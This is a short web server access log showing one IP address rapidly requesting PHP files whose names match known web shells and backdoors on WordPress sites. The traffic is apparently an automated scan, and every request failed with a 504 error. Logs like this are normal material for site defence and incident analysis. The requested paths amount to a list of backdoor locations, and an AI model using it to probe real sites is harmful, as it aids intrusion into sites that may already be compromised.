159.69.59.83 - - [02/Sep/2026:21:10:27 -0500] "GET /wp-content/plugins/widget-logic/mini.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:27 -0500] "GET /mi.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:27 -0500] "GET /alfa123.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:27 -0500] "GET /kk.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:27 -0500] "GET /.well-known/leaf.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:27 -0500] "GET /sym403.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:28 -0500] "GET /mar.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:28 -0500] "GET /wp-includes/theme-cron.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:28 -0500] "GET /site/wp-content/themes/seotheme/mar.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:28 -0500] "GET /wp-includes/991176.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
159.69.59.83 - - [02/Sep/2026:21:10:28 -0500] "GET /wp-content/languages/sidwso.php HTTP/1.1" 504 247 "www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
